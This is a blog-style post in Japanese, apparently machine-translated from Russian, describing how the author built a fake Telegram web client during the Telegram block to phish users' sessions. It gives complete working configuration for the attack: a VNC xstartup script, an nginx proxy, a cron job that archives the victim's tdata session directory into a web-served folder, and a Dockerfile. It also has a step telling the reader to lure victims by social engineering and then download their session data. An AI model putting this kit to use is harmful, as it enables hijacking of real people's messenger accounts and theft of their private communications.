政府の決定に関連するリスクを考慮に入れた成熟したビジネスでは、VPNを使用して回避策を使用する必要があったため、これはいくつかの不便をもたらしました。 しかし、このようなイベントの準備ができていない一般ユーザーにとって、これは新たな脅威をもたらしました。 パニックで、ユーザーは、DNSプッシュアップやその他のMITM攻撃の形でトラップになるとは考えずに、最初に登場した無料のVPNを検索して使用し始めました。
テレグラムは最大の視聴者を抱えており、この事実はITビジネスでは無視できませんでした。 企業は、このメッセンジャーのAPIを使用してビジネスツールの開発に莫大な資本を投資しています。 多くの政府プロジェクトでさえ、テクニカルサポートボットの開発に投資してきました。その顕著な例は、国家サービス(EPGU)のポータルです。
誇大広告の波は、パニック状態のユーザーの脆弱性について同僚との議論を引き起こし、テレグラムフィッシングの実験を行うことにしました。
多くのユーザーがこのメッセンジャーのWebバージョンにアクセスする際に問題に遭遇したため、私たちはそれを試してみることにしました。 私たちの目標は、非常に悪名高い暗号化キーとセッションデータを保存するtdataプロファイルを取得することでした。
レシピの構成には、次の主要コンポーネントが含まれます。
- Telegram Desktop 1.2.17(Linux)
- Dockerバージョン17.05.0-ce
- noVNC
計画によると、XとTelegramが開始されるDockerイメージを収集する必要があり、noVNCは起動されたTelegramをnginxクライアントWebブラウザーを通じてブロードキャストします。
ステップ1:デスクトップ環境の実行をTelegramのみの実行に制限し、VNCサーバーを介してブロードキャストします。
これを行うには、次の内容の.vnc / xstartupファイルを作成します。
#!/bin/sh if [ -z "$VNCAPP" ] then # Uncomment the following two lines for normal desktop: unset SESSION_MANAGER exec /etc/X11/xinit/xinitrc [ -x /etc/vnc/xstartup ] && exec /etc/vnc/xstartup [ -r $HOME/.Xresources ] && xrdb $HOME/.Xresources xsetroot -solid grey vncconfig -iconic & x-terminal-emulator -geometry 80x24+10+10 -ls -title "$VNCDESKTOP Desktop" & x-window-manager & else xsetroot -solid black vncconfig -iconic & x-window-manager & $VNCAPP sleep 10 vncserver -kill $DISPLAY fi
ステップ2: nginxを使用してnoVNCブロードキャストをポート80に転送します。
既定の構成ファイルを作成して、後でイメージに配置します。
upstream vnc_proxy { server 127.0.0.1:6080; } server { listen 80 default_server; listen [::]:80 default_server; location / { add_header Access-Control-Allow-Origin *; proxy_pass http://127.0.0.1:6080; proxy_set_header Host $host; proxy_set_header X-Real-IP $remote_addr; proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for; proxy_redirect default; client_max_body_size 10m; client_body_buffer_size 128k; proxy_connect_timeout 90; proxy_send_timeout 90; proxy_read_timeout 90; proxy_buffer_size 4k; proxy_buffers 4 32k; proxy_busy_buffers_size 64k; proxy_temp_file_write_size 64k; } location /websockify { proxy_http_version 1.1; proxy_pass http://vnc_proxy/; proxy_set_header Upgrade $http_upgrade; proxy_set_header Connection "upgrade"; # VNC connection timeout proxy_read_timeout 61s; # Disable cache proxy_buffering off; } }
ステップ3:本格的なTelegramフィッシングサービスではなく実験モデルを構築してデータを抽出するため、cronを使用してtdataディレクトリのアーカイブをWebサーバーで使用可能なディレクトリのいずれかにコピーすることにしました。
次の内容のcronファイルを作成します
* * * * * root tar -czf /root/tests/data.tar.gz /root/.local/share/TelegramDesktop
ステップ4: VNC:
この手順ではnoVNCのカスタマイズが必要です。noVNCからツールバーを切り取り、パスワード.vnc / passwdに一致するパスワードを指定してVNCサーバーへの自動接続を登録しました。このパスワードはvncpasswdユーティリティで生成できます。
ステップ5: Dockerイメージをビルドします。
Telegramバイナリなど、事前に準備したすべてのものを1つのディレクトリに入れ、Dockerfileを作成し、アセンブリを続行します。
# Version: 0.0.1 FROM vcatechnology/linux-mint MAINTAINER Poul Lysunenko <mpoul@hungosh.net> RUN apt update RUN apt install -y net-tools language-pack-ru cinnamon nginx chromium-browser vnc4server xvnc4viewer xfonts-base RUN locale-gen ru_RU.UTF-8 && dpkg-reconfigure locales COPY noVNC/ /root/ COPY .vnc/ /root/.vnc COPY default /etc/nginx/sites-available/ COPY Telegram /root/ COPY cron /etc/cron.d/sample RUN apt install -y cron EXPOSE 6080 ENTRYPOINT /usr/sbin/service nginx start && /usr/sbin/service cron start && VNCAPP=/root/Telegram vnc4server -depth 24 -geometry 800x600 && /root/utils/launch.sh --vnc localhost:5901
ステップ6:ソーシャルエンジニアリングのすべての知識とスキルを使用して、画像を組み立てて起動した後、実験の犠牲者にTelegram Webバージョンの代替を味わってもらいます。
承認後1分で、プロファイル/tests/data.tar.gzをダウンロードします
結論:
ご存知のように、私は同僚と議論に勝ちましたが、この利益は喜びをもたらしませんでした。 情報セキュリティの分野の情勢は、ロシアのインターネット利用ポリシーの急激な変化の条件に関連したマイナスの傾向を持っています。 この簡単な調査により、情報技術に精通している人々でさえ、攻撃者が付けたレーキを踏むことができることが示されました。
PS:メッセンジャーのオープンセッションを比較することを忘れないでください。おそらく誰かが今読んでいます